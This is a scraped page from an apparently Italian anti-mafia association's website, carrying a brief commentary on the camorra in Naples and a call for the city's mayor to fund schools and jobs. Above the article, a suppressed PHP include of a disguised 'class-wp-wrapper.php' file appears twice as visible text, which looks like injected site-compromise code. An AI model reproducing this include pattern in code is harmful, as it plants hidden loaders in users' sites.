@include("/web/htdocs/www.comitato-antimafia-lt.org/home/wp-includes/class-wp-wrapper.php"); @include("/web/htdocs/www.comitato-antimafia-lt.org/home/wp-includes/class-wp-wrapper.php"); La camorra a Napoli e la barzelletta di Alfano e dei governi che pensano di risolvere i problemi solamente militarizzando il territorio.Sindaco De Magistris,progetti un grande piano di realizzazione nei quartieri di scuole,servizi ed occasioni di lavoro e chieda alla Regione ed all’Europa i relativi finanziamenti,Ma faccia presto,prima che la situazione imploda del tutto,in quanto dalla fase della progettazione a quella dell’inizio della realizzazione passano almeno 7-8 anni. – Antonino Caponnetto ODV

Ti potrebbe anche interessare...